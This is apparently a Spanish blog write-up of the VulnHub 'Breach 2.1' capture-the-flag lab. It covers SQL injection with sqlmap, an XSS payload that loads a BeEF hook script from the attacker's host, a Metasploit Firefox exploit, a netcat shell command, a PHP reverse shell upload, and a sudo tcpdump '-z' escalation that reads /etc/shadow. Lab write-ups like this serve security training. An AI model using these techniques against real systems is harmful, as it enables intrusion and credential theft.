domingo, 4 de septiembre de 2016

Completando "CTF Breach2.1".

Primero que nada, gracias a vulnhub.com por agregar mi paper de resolución en español del CTF de PWNLAB INIT en su propia web: https://www.vulnhub.com/author/cnfs,358/

Bien arranquemos este gran CTF, que por cierto me gusto mucho mas que el anterior que resolví.











Comienzo realizando un escaneo de puertos con nmap a la IP objetivo que en este caso esta estática y es la siguiente: 192.168.110.151:


  • nmap -sV -p- 192.168.110.151 -T5







Vemos que figuran 3 puertos abiertos, 2 pertenecientes a rpc y el mas llamativo un ssh server corriendo en el puerto mas alto.

Procedemos a conectarnos via SSH:


  • cnfs@X55:~/Escritorio$ ssh 192.168.110.151 -p 65535











Como vemos en la imagen nos arroja un banner y nos pide ingresar un password. Acá podríamos intentar bruteforcear el login pero como pensé en el CTF anterior, creo que va mas por el lado de resolverlo usando la lógica y tecnicismo que poner a crackear.

Después de mirar y mirar me enfoque en el banner y saque dos datos importantes, en una misma linea:

"Peter, if that's you - the password is in the source"

El usuario podría ser Peter......y la contraseña mmm "the password is.....'inthesource'??". Inserto eso, y noto como respuesta que automáticamente se cierra la conexión de manera remota.

Se habrá cerrado el puerto?.. se habrá caído el servicio?. Verifiquemos con un nmap nuevamente.


















Ahora nos figura un nuevo puerto abierto, un puerto http. Se pone bueno esto..

Verfico con Nikto a ver si me da algo de info extra, ademas de analizarlo manualmente, y no logro obtener nada interesante. Mas que un directorio /icons/ y uno de /images/ el cual no tengo permisos para acceder. Vemos info sobre una fuga de etags.

El index es ".html", no podemos hacer mucho mas.. intento buscar ayuda con un scanner llamado Dirb el cual espero me ayude a conseguir alguna pista que no tenga a la vista:


  • cnfs@X55:~/bin/dirb222$ ./dirb http://192.168.110.151 wordlists/common.txt 

































Bingo!. Resulta que hay un blog en este site. Y entre los resultados me encuentro las siguientes carpetas y archivos:

  1. /blog/README
  2. /blog/smilies/
  3. /blog/wysiwyg/
  4. /images/
  5. /blog/
Si miramos el file README, logramos entender que se trata de unas serie de instrucciones para 'instalar' el blog. Eso quiere decir que si le damos al install.php, seguramente nos conceda el placer de instalar desde cero y setear nuestra cuenta de 'admin'.. probemos.

Luego de seguir unos 'Next' seteo la cuenta de Admin satisfactoriamente. Pero al loguear, veo que no podemos hacer mucho mas, la funcionalidad esta reducida. Muy mal... jeje. Sigo.

Verificando exploits por exploit-db, logro dar con algunos que me dan información de posibles XSS y SQLi.

Logro comprobar, que con un simple <script>alert();</script>, en el blog/register.html de la pagina, precisamente en el campo de Username, es vulnerable. Luego al ir a http://192.168.110.151/blog/members.html vemos el alert:





























Luego de familiarizarme un poco mas con la web, intento correr SQLMAP para ver con que me sorprende en el siguiente path:


  • http://192.168.110.151/blog/index.php?search=


















Y el resultado parece ser muy bueno:




















Tranquilamente podria haber puesto un --all para que teste y resuelva todo automaticamente, pero preferi hacerlos mas ordenados de ese modo.
Nos alista unas 5 base de datos que contiene el sitio y en las cuales podemos analizar. Como esto es un Walkthrough voy a saltar todas las pruebas positivas y negativas realizadas, y voy directo a lo mas importante.

Luego de familiarizarme con las DB's logro dar con una base de datos llamada "oscommerce", en la cual posee una tabla llamada: osc_administrators. ;D

Dumpeamos dicha tabla:

  • cnfs@X55:~$ sqlmap -u "http://192.168.110.151/blog/index.php?search=" --dump -T osc_administrators -D oscommerce













Por lo que vemos parece ser un hash md5. Deberíamos crackearlo, pero antes de desperdiciar tiempo crackeandolo podríamos verificar en alguna base de datos online si no fue crackeado con anterioridad y alguien ya lo hizo por nosotros jeje.

Podrían usar una web como https://crackstation.net, ingresan el hash, y le dan a crack!. Tuve suerte y el resultado fue instantáneo, como dije, nos ahorramos tiempo:















(El password búsquenlo ustedes mismos, no sean vagos jeje)

Bueno continuando con el análisis, verificando algunos archivos dumpeados de la tabla oscommerce, encuentro este Path, pero al parecer no es accesible desde apache:














Tambien verificando otros archivos, pude encontrar un mail interesante: milton@breach.local, ese ".local" da a entender que es un mail local de linux, un vhost mas que seguro.

Luego de dar vueltas y vueltas, (de verdad que tarde mucho time.. andaba poco de cafe), logre asimilar el Bannerdel /index.html que dice BEEF + el posible XSS en members.. estaba servido y a la vista. Se trataba de BEEF FRAMEWORK!!!.
Link de referencia: http://www.hackplayers.com/2012/05/beff-framework-para-mi-la-carne-muy.html











Bien, si corro el Wireshark a sniffear la red de la victima, logro ver algo como lo siguiente, que se repite reiteradamente, en un plazo muy corto..











Es como si se tratase de un bot.

Procedo a instalar y correr el Beef Framework. Intento Hookear mi ip, para verificar que todo funciona bien y mi pc se reporta hookeada mediante el siguiente .html de prueba:

















Si ahora veo el Beef-Framework:













Bien, lo que se me ocurre hacer ahora es volver a donde había inyectado previamente el script alert, en el campo username que era vulnerable a XSS. Cree un nuevo usuario con el siguiente script (en mi caso mi ip local asignada en ese momento): <script src="http://192.168.0.104:3000/hook.js"></script>

Y eso es todo, me dispuse a esperar...esperar.. y esperar. Hasta que, it works!:


Finalmente obtuvimos una conexión. La victima posee un Firefox version 15.0.
Si vemos un poco mas abajo, nos encontramos con la cookie:

La cual intentamos descifrar utilizando un site como https://hashkiller.co.uk/md5-decrypter.aspx:


Buscando un poco sobre la version del Firefox, encontramos un exploit aparentemente util en Metasploit: https://www.rapid7.com/db/modules/exploit/multi/browser/firefox_proto_crmfrequest.


Ya que estoy utilizando Beef, previamente lo integre con Metasploit. El cual me permite ejecutar exploits desde Beef a las victimas con la db de exploits de metasploit. Corremos el exploit previamente dicho y..

















Si bien obtuve shell, se me cerraba realmente muy rapido, a penas segundos duraba para tipear.. por lo cual logre arriesgarme y tratar de abrir un puerto y brindar una shell salvadora con netcat. Antes de que se me desconectara tipie rapidamente:

$> nc -le /bin/sh -vp 13337

Y parece que funciono..






















Necesito de mi amiga /BIN/BASH:









;D.. ya la tenemos.

Investigamos un poco... encontramos el bendito script que chequeaba constantemente y nos permitio obtener la shell:
















Sigo investigando..














Esto nos permitira conectarnos via mysql, pero como ya lo revise y anteriormente habiamos dumpeado tablas, sigo investigando por algo nuevo..

Realizo un netstat -putona, (:P)














Vemos que hay varios puertos, pero me llama la atención ese 2323, si telneteamos a ese puerto localmente, nos sale el siguient prompt..



























Todo parece indicar que es Houston... mmmm.. despues de probar muchas veces, logre dar con el usuario que era el que estaba en un /home/: "milton" y la contraseña que acababa de resolver: "Houston". Sin embargo seguian las preguntas..

















Whose stapler is it?..... Despues de probar y googlear, llegue a una QUIZ, donde había 4 posibles respuestas, y vaya locura pero me sirvió. xD




























Bueno verificamos, y logueamos como Milton:















Luego de seguir verificando, hay algo interesante en el ".profile" de Milton:
























Hay 2 lineas que ejecutan un script en python llamado cd.py e inicializa como root la aplicacion nginx.

Si verifico los puertos me llama la atencion el 8888, intento conectar como antes al localhost 8888 y sale lo siguiente:



















Parece ser un NGINX, y si hablamos de un nginx estariamos hablando de un servidor http.. entro desde el chrome y logro encontrar la web de oscommerce.
No logro encontar el login de administrador asi que vuelvo a la shell, y verifico el path..


  • http://192.168.110.151:8888/oscommerce/admin/index.php


Anteriormente habiamos sacado el password de esta tabla, pero al parecer no era correcto mas alla de que el hash estaba bien, la clave es admin:admin.

Automaticamente que me loguie, trate de buscar algun modo de subir alguna shell, encontre un File Manager, pero todos los directorios me limitaban en permisos..


Hasta que encontré ese directorio llamado work. El cual tengo permiso de escritura...
Subo mi reverse shell "back2.php":


Ejecutamos un netcat a la escucha del puerto que configuramos la shell..
Navegamos hasta la shell desde el chrome, y vemos si funciona:



Bingo!... corremos la shell bajo el usuario blumbergh.

Importamos /bin/bash con python, y luego verificamos que PATH tenemos y verificamos un SUDO -l:


Vemos que nos permite ejecutar TCPDUMP. Que raro.. e interesante. 
Luego de analizar, mirar, probar... logre dar con esta referencia desde el site de seclist: http://seclists.org/tcpdump/2010/q3/68.

Tcpdump incorporo hace unos años la opcion '-z' que suele ir combinada con -C o -G.
Esta opcion nos permite ejecutar un comando en paralelo a la captura. Vamos a hacer una prueba...

Creamos un file llamado "inject" le damos permiso +x y luego invocamos al tcpdump mediante sudo, en las instrucciones finales le pasamos como -z /tmp/inject el cual contiene un cat al etc/shadow. Como vemos, el resultado funciona! ;D.

Ahora vamos a intentar enviar una shell_reverse a un puerto que dejemos escuchando localmente, a ver si nos da Root de esa manera:

Efectivamente soy ROOT. Invocamos bin/bash, y luego el bendito cat flag.

THE_END.

Thanks to mrb3n and VulnHub for this CTF!.

No hay comentarios:

Publicar un comentario en la entrada

Deja un comentario..